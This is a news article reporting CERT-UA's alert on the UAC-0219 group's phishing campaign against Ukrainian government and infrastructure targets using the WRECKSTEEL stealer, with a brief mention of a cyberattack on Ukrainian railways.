Ukraine’s Computer Emergency Response Team (CERT-UA) has identified a significant increase in cyber espionage activities targeting the nation, orchestrated by the UAC-0219 group. The hackers employ the WRECKSTEEL PowerShell stealer to extract sensitive information from governmental entities and critical infrastructure. The malware is distributed through phishing emails with compromised accounts.
The CERT-UA is reported to have disclosed in its Apr. 1 alert CERT-UA#14283 that “the hackers used compromised accounts to send messages containing links to public file-sharing services such as DropMeFiles and Google Drive. When opened, the links executed a PowerShell script, enabling attackers to extract text documents, PDFs, images, and presentations, as well as take screenshots of infected devices.”
The warning to the global cyber defender community revealed at least three cyber espionage incidents focused on data theft using the specialized PowerShell-based stealer dubbed WRECKSTEEL, which has been observed in VBScript and PowerShell variants.
CERT-UA, which named the hacking group UAC-0219, said the cyber espionage campaign has been active since at least the fall of 2024. In one incident, attackers sent phishing emails falsely claiming that a Ukrainian government agency planned to cut salaries. The email contained a malicious link purportedly leading to a list of affected employees.
While CERT-UA did not attribute the attacks to a specific country, most phishing-based espionage campaigns targeting Ukrainian government institutions originate from Russia.
“CERT-UA continues to systematically collect and analyze cyber incident data to provide up-to-date threat intelligence,” Veronika Telychko, a technical writer at SOC Prime, wrote in a Thursday blog post. SOC Prime runs the largest platform for collaborative cyber defense, aiming to enhance threat detection through collective expertise.
“In March 2025, at least three cyber-attacks against government agencies and the critical infrastructure sector in Ukraine were observed in the cyber threat landscape linked to the UAC-0219 hacking group,” Telychko detailed. “Adversaries primarily relied on WRECKSTEEL malware designed for file exfiltration, available in both its VBScript and PowerShell iterations.”
In this latest campaign addressed in the corresponding CERT-UA alert, Telychko said that the group leveraged compromised accounts to distribute phishing emails containing links to public file-sharing services such as DropMeFiles and Google Drive. “In some cases, these links were embedded within PDF attachments. Clicking these links triggered the download and execution of a VBScript loader (typically with a .js extension), which then executed a PowerShell script. This script was designed to search for and exfiltrate files of specific extensions (.doc, .txt, .xls, .pdf, etc.) and capture screenshots using cURL.”
She added that analysis indicates that this malicious activity has been ongoing since at least the fall of 2024. “Previously, threat actors deployed EXE files created with the NSIS installer, which contained decoy documents (PDF, JPG), a VBScript-based stealer, and the image viewer ‘IrfanView’ for taking screenshots. However, since 2025, the screenshot-capturing functionality has been integrated into PowerShell.”
CERT-UA’s revelation of the UAC-0219 threat highlights the ongoing advancement of malware aimed at Ukrainian organizations. It reveals the adoption of advanced social engineering tactics and maps with global trends of cybersecurity attacks at critical infrastructure installations.
Last month, Ukraine’s Ukrzaliznytsia railway operator was hit by a cyberattack that led to a disruption of online ticket sales and cargo registration. The rail operator has since identified a distinct ‘Russian trace’ in the incident. Currently, up to 90 percent of essential online passenger services have been restored. Ukrainian Railways specialists ‘plan to launch online services for freight forwarders during the first decade of April.’
Ukraine’s state-owned railway company stated that it took four days of relentless work to restore crucial services, prioritizing passenger ones.
